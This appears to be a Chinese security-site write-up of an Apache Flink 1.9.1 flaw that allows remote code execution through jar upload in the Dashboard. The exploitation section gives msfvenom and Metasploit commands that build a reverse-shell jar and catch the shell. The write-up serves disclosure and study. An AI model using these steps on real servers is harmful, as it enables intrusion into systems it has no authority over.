标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-2508]   作者: hudie 发表于: [2019-11-22]

本文共 [504] 位读者顶过

0x00 简介


Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。

[出自:jiwo.org]

0x01 漏洞概述


攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。


0x02 影响版


至目前最新版本Apache Flink 1.9.1


0x03 环境搭建


测试环境:Flink 1.9.1 java8+

Apache Flink 1.9.1安装包下载


1 https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz


解压后进入bin文件夹,运行./start-cluster.sh

验证Flink启动之后,默认web 端口8081是否正常





访问http://ip:8081/可看到环境页面




0x04 漏洞利用


1、上传msf生成的jar包

生成rce.jar文件



1 msfvenom -p java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8087 -f jar > rce.jar




2、配置msf监听

1 use exploit/multi/handler

2 set payload java/shell/reverse_tcp

3 set LHOST 127.0.0.1

4 set LPORT 8087

5 show options

6 run




在Submit New Job处上传rec.jar文件,点击submit



成功反弹shell,执行id可看到结果



0x05 修复方式


等待官网更新补丁或等待官网出最新版本后及时更新


评论

暂无
发表评论
 返回顶部 
热度(504)
 关注微信